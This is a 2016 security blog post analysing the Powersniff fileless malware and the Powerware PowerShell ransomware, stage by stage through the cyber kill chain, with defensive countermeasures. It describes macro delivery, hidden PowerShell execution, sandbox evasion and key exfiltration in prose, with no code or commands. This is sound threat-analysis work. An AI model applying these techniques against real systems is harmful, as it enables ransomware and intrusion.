Attackers Making Use Of PowerShell and Macros for Malicious Activity

By John Atienza on April 1, 2016


Malicious MS-Office macros are being used to both compromise machines and deliver ransomware. Powersniff is a file-less malware that runs completely in memory. Powerware is ransomware ran via PowerShell. Powersniff targets victims mostly in the United States, but countries in Europe and specifically Canada were also affected. Powerware was first seen targeting a healthcare organization according to researchers at Carbon Black. The following is a breakdown of both of the attacks and their weaknesses / counter-measures.

Cyber Kill Chain Breakdown

  1. Reconnaissance – Collection of emails targeting possible victims (No specific targeted industries for Powersniff campaign, but most of the emails targeted professional services, hospitality, manufacturing, wholesale, energy, and high-tech industries.
  2. Weaponization – Malicious macro in a MS-Office document
  3. Delivery – Spam emails with the attached malicious Word document
  4. Exploitation – Tricks user into opening malicious office document (ex: docx) requests to enable macros if they are disabled otherwise it is automatically executed. This is where Word docs with malicious macros can be stopped. Organizations need user security awareness training and macros to be disabled in MS Office.
  5. Installation –
    1. Powersniff (Ursnif family) is sandbox and vm aware, and it invokes Windows Management Instrumentation service (WMI) to open a hidden instance of PowerShell via command prompt and runs completely in memory. If the system is locked down, powersniff will request permissions to run. Powershell downloads a shellcode script that is placed in a specified location depending on the target operating system being 32 or 64 bit. The shellcode is decrypted and executes a payload. The malware scans the machine for strings to detect what sort of target it has infected. If the victim is involved in healthcare or education it skips the target, but “financial systems (ex: POS systems) are preferred and marked.” Cached URLs are checked for Citrix, XenApp, and dana-na (Juniper VPN).
    2. Powerware (PowerShell Ransomware) executes 2 instances of PowerShell via cmd.exe. Powershell is then used to download the ransomware script. Another instance of PowerShell is used for input. The script generates random numbers for the encryption key and a UUID is assigned to the victim computer.
  6. Command & Control –
    1. Powersniff – Connects to C&C servers (Palo Alto Networks could not find any responsive C&C servers at the time of this research)
    2. Powerware – The script sends the encryption key and the UUID back to the attacker via HTPP in plaintext. This is where there is an operational weakness. Victims with full packet capture solutions can identify the correct domain and IP then retrieve the encryption key. After communicating with the C&C server the script encrypts files that have specific extensions it can encrypt a broad range of file formats. HTML with instructions on how to pay the $500 ransom is placed on every folder where files have been encrypted.
  7. Actions on Objectives –
    1. Powersniff – Not enough data
    2. Powerware – None.